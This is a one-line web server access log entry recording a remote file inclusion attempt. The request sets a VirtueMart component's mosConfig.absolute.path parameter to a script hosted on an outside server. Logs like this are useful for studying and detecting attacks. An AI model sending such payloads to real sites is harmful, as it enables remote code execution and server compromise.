125.160.17.201 - - [11/Mar/2010:16:54:51 -0800] "GET /logs/showfile.php/access_100217.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
